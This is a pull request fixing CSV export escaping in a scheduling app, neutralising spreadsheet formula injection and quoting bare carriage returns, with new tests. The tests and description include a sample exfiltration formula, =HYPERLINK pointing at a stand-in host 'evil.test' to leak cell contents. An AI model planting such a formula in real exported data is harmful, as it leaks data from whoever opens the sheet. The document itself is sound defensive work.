### PR TITLE
fix(csv): quote bare carriage returns and neutralise formula injection

### DIFF
--- a/apps/web/modules/users/lib/UserListTableUtils.ts
+++ b/apps/web/modules/users/lib/UserListTableUtils.ts
@@ -75,9 +75,9 @@ export const generateCsvRawForMembersTable = (
     );
 
     const requiredColumns = [
-      email, // Members column
-      `${orgDomain}/${username}`, // Link column
-      role, // Role column
+      sanitizeValue(email), // Members column
+      sanitizeValue(`${orgDomain}/${username}`), // Link column
+      sanitizeValue(role), // Role column
       sanitizeValue(teams.map((team: { id: number; name: string }) => team.name).join(",")), // Teams column
     ];
 

--- a/packages/lib/csvUtils.test.ts
+++ b/packages/lib/csvUtils.test.ts
@@ -1,0 +1,136 @@
+import { describe, expect, it } from "vitest";
+
+import { objectsToCsv, sanitizeValue } from "./csvUtils";
+
+/**
+ * Minimal RFC 4180 reader, used to assert on the *parsed* shape of the CSV
+ * rather than on the exact escaping we happen to emit. CR, LF and CRLF are all
+ * record separators.
+ */
+const parseCsv = (input: string): string[][] => {
+  const rows: string[][] = [];
+  let row: string[] = [];
+  let field = "";
+  let inQuotes = false;
+
+  for (let i = 0; i < input.length; i++) {
+    const char = input[i];
+
+    if (inQuotes) {
+      if (char === '"') {
+        if (input[i + 1] === '"') {
+          field += '"';
+          i++;
+        } else {
+          inQuotes = false;
+        }
+      } else {
+        field += char;
+      }
+      continue;
+    }
+
+    if (char === '"') {
+      inQuotes = true;
+    } else if (char === ",") {
+      row.push(field);
+      field = "";
+    } else if (char === "\r" || char === "\n") {
+      if (char === "\r" && input[i + 1] === "\n") i++;
+      row.push(field);
+      rows.push(row);
+      row = [];
+      field = "";
+    } else {
+      field += char;
+    }
+  }
+
+  row.push(field);
+  rows.push(row);
+
+  return rows;
+};
+
+describe("csvUtils", () => {
+  describe("fn: sanitizeValue", () => {
+    it("should leave ordinary values untouched", () => {
+      expect(sanitizeValue("hello")).toEqual("hello");
+      expect(sanitizeValue("")).toEqual("");
+      expect(sanitizeValue("user@example.com")).toEqual("user@example.com");
+    });
+
+    it("should quote commas and double up quotes", () => {
+      expect(sanitizeValue("a,b")).toEqual('"a,b"');
+      expect(sanitizeValue('say "hi"')).toEqual('"say ""hi"""');
+    });
+
+    it("should quote every line break, including a bare CR", () => {
+      for (const breakChar of ["\n", "\r", "\r\n"]) {
+        expect(sanitizeValue(`a${breakChar}b`)).toEqual(`"a${breakChar}b"`);
+      }
+    });
+
+    it("should neutralise values a spreadsheet would evaluate as a formula", () => {
+      for (const value of ["=1+1", "+1", "-1", "@SUM(A1)", "\tcmd", "\rcmd", "  =1+1"]) {
+        // The value may also need CSV quoting (a bare CR does), so assert on the
+        // parsed field rather than on the raw escaped string.
+        const [[field]] = parseCsv(sanitizeValue(value));
+
+        expect(field.startsWith("'"), JSON.stringify(value)).toBe(true);
+      }
+    });
+
+    it("should not treat a formula character in the middle of a value as a trigger", () => {
+      expect(sanitizeValue("2+2 meeting")).toEqual("2+2 meeting");
+      expect(sanitizeValue("Q&A - weekly")).toEqual("Q&A - weekly");
+    });
+  });
+
+  describe("fn: objectsToCsv", () => {
+    it("should return an empty string for no rows", () => {
+      expect(objectsToCsv([])).toEqual("");
+    });
+
+    it("should keep one record per row when a value contains a bare CR", () => {
+      const csv = objectsToCsv([
+        { uid: "abc", title: "normal", attendee: "Alice" },
+        { uid: "def", title: "CR\rinjected", attendee: "Bob" },
+      ]);
+
+      const parsed = parseCsv(csv);
+
+      // header + 2 records — previously the CR split the second one in half and
+      // shifted every column after it.
+      expect(parsed).toHaveLength(3);
+      expect(parsed[2]).toEqual(["def", "CR\rinjected", "Bob"]);
+      expect(parsed.every((row) => row.length === 3)).toBe(true);
+    });
+
+    it("should round-trip commas, quotes and newlines", () => {
+      const rows = [{ uid: "abc", title: 'a,b "c"\nd', attendee: "Alice" }];
+
+      const parsed = parseCsv(objectsToCsv(rows));
+
+      expect(parsed).toHaveLength(2);
+      expect(parsed[1]).toEqual(["abc", 'a,b "c"\nd', "Alice"]);
+    });
+
+    it("should neutralise a formula even when the value also needs quoting", () => {
+      const csv = objectsToCsv([{ title: '=HYPERLINK("https://evil.test?d="&A1,"Click")' }]);
+
+      const parsed = parseCsv(csv);
+
+      // Quoting alone does not help: spreadsheets strip the quotes before
+      // evaluating, so the leading = has to go.
+      expect(parsed[1][0].startsWith("=")).toBe(false);
+      expect(parsed[1][0]).toEqual('\'=HYPERLINK("https://evil.test?d="&A1,"Click")');
+    });
+
+    it("should coerce non-string values and treat null/undefined as empty", () => {
+      const parsed = parseCsv(objectsToCsv([{ a: 1, b: null, c: undefined, d: false }]));
+
+      expect(parsed[1]).toEqual(["1", "", "", "false"]);
+    });
+  });
+});

--- a/packages/lib/csvUtils.ts
+++ b/packages/lib/csvUtils.ts
@@ -1,3 +1,8 @@
+// Excel, LibreOffice and Google Sheets evaluate a cell as a formula when it
+// starts with any of these. Leading whitespace is skipped by the parsers, so
+// it has to be skipped here too.
+const FORMULA_TRIGGER = /^[\s]*[=+\-@\t\r]/;
+
 export const downloadAsCsv = (data: string | Record<string, any>[], filename: string) => {
   // If data is an array of objects, convert it to CSV string
   const csvString = typeof data === "string" ? data : objectsToCsv(data);
@@ -47,15 +52,21 @@ export const objectsToCsv = (data: Record<string, any>[]): string => {
 };
 
 export const sanitizeValue = (value: string) => {
+  // Spreadsheet apps evaluate a leading =, +, -, @, tab or CR as a formula, and
+  // they do so *after* stripping the CSV quotes - so quoting alone is not enough.
+  // Prefix with a single quote to neutralise it (OWASP CSV injection guidance).
+  const neutralized = FORMULA_TRIGGER.test(value) ? `'${value}` : value;
+
   // handling three cases:
   // 1. quotes - we need to double quotes for CSV
   // 2. commas
-  // 3. newlines
-  if (value.includes('"')) {
-    return `"${value.replace(/"/g, '""')}"`;
+  // 3. line breaks - CR, LF and CRLF are all record separators per RFC 4180,
+  //    so a bare \r has to be quoted too or it splits the row
+  if (neutralized.includes('"')) {
+    return `"${neutralized.replace(/"/g, '""')}"`;
   }
-  if (value.includes(",") || value.includes("\n")) {
-    return `"${value}"`;
+  if (neutralized.includes(",") || /[\r\n]/.test(neutralized)) {
+    return `"${neutralized}"`;
   }
-  return value;
+  return neutralized;
 };


### PR DESCRIPTION
## What does this PR do?

Fixes #29843.

`sanitizeValue()` is the escape function every CSV export runs its values through. It had two holes, both reachable with text an *attacker* supplies — booking titles and attendee names come from whoever books the meeting, not from the admin downloading the file.

### 1. A bare carriage return split the row

The line-break check only looked for `\n`. Per RFC 4180 a lone `\r` is a record separator too, and real parsers honour that, so a value containing `\r` was emitted unquoted and broke the row apart:

```
  ['Booking UID', 'Title', 'Attendee name']
  ['abc', 'normal', 'Alice']
  ['def', 'CR']            <- one record became two
  ['injected', 'Bob']      <- and every column after it shifted
```

Now `/[\r\n]/` is quoted, so one field stays one field.

### 2. CSV formula injection (CWE-1236)

Values starting with `=`, `+`, `-`, `@`, tab or CR are evaluated as formulas by Excel, LibreOffice and Google Sheets. They were passed through untouched.

Quoting does **not** help here — spreadsheets strip the CSV quotes *before* evaluating — so a booking titled `=HYPERLINK("https://evil.test?d="&A1,"Click")` came out as a live link in an admin's sheet that leaks neighbouring cell contents, even though the field was quoted (it contains quote characters). The fix prefixes a single quote, per OWASP's CSV injection guidance. Leading whitespace is included in the trigger because parsers skip it.

### 3. Three columns in the members export skipped escaping entirely

In `generateCsvRawForMembersTable()` the `Teams` and attribute columns called `sanitizeValue`, but `email`, `role` and `${orgDomain}/${username}` were concatenated raw. That reads as an oversight rather than intent, so they now go through the same escaping as their neighbours.

## How was it tested?

`csvUtils.ts` had no test file. This PR adds one with 10 tests.

They assert on the **parsed** CSV, using a small RFC 4180 reader in the test file, rather than on the exact escaped string — so they pin the behaviour that matters (one record per row, no live formula) and survive a change in escaping style.

- ordinary values, commas and quotes are unchanged in behaviour
- `\n`, `\r` and `\r\n` are all quoted
- `=`, `+`, `-`, `@`, tab, CR and leading-whitespace-then-`=` are neutralised
- a formula character *inside* a value (`2+2 meeting`, `Q&A - weekly`) is left alone — no false positives on ordinary meeting titles
- `objectsToCsv` keeps one record per row when a value contains a bare CR
- commas/quotes/newlines round-trip through the parser unchanged
- a formula that also needs quoting is still neutralised
- non-string values coerce, `null`/`undefined` become empty

**Verification:**

- All 10 new tests pass.
- Reverting `sanitizeValue` to the current `main` implementation with the new tests in place fails **exactly the 4 behavioural tests** (bare CR quoting, formula neutralisation, the `objectsToCsv` row-split case, and the quoted-formula case) — so they pin this fix rather than passing incidentally.
- The **existing 8 tests** in `apps/web/modules/users/lib/UserListTableUtils.test.ts` still pass unchanged after adding `sanitizeValue` to the three columns — no snapshot churn, because none of the fixture values need escaping.

18 tests pass in total across both files.

## Note on the mitigation choice

Prefixing `'` is the conventional fix and is what OWASP recommends, but it is visible in the cell if a user opens the file as plain text. The alternative — stripping the leading character — loses data. I went with the prefix since a booking title like `=1+1` is far more likely to be an attack than a meaning-bearing title, but I'm happy to switch if you'd prefer a different trade-off.
